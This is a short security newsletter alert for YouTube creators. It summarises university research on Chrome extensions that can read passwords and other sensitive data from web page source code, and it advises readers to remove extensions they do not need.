This Chrome Extension can steal your password!

Creator Alert

Hello Reader,

Why this Alert?

We are keeping our eye on a Chrome Web extension that could steal passwords from a website’s source code. This was recently discovered by a team of researchers from the University of Wisconsin-Madison.

The team also discovered that numerous websites, including some Google, store passwords in plaintext (that means not encrypted) within the code of their web page.

Amongst the top 10,000 websites that they tested, here are some notable website examples that are vulnerable to this exploit:

  • Gmail.com – plaintext passwords on HTML source code
  • Amazon.com – credit card details (including security code) and ZIP code are visible in plaintext form on the page’s source code
  • Facebook.com – user inputs can be extracted via the DOM API
  • Citibank.com – user inputs can be extracted via the DOM API
  • Cloudflare.com – plaintext passwords on HTML source code

Here are some website examples that expose Social Security Numbers:

  • Irs.gov – SSNs are visible in plaintext form on the web page source code
  • Capitalone.com – SSNs are visible in plaintext form on the web page source code
  • Usenix.org – SSNs are visible in plaintext form on the web page source code

Our thoughts:

Thankfully, this was a research paper showing a proof-of-concept of a vulnerability that exists.

However, now that this research paper is out, we are concerned that hackers will use the methods outlined in the paper to get passwords.

What they would do is create a seemingly innocent Chrome Extension such as an “ad blocker” or a “ChatGPT helper”. Hiding inside that would be the code to get this sensitive information.

We are also concerned that the code doesn’t trigger the anti-virus as it uses code that is deemed as safe and just part of the way the web browsers work.

How does this impact you as a Creator?

Gmail was specifically mentioned which means this could put your YouTube Channel at risk.

This won’t get around 2-Factor Autnetication, but this could be a way to attack your other unprotected accounts or work out your “secret-password-creating” formula.

What should you do?

Look at your own Chrome Extension. Are they all absolutely necessary?

We strongly suggest removing those extensions that are not critical.

Not ideal, but you can also disable extensions and only enable them when you need to use them.

Want to know more?

Read the research paper here.

Keep safe out there,

The Security For Creators Team

Was this sent to you? Sign up here.

Want to secure your YouTube channel? Start here.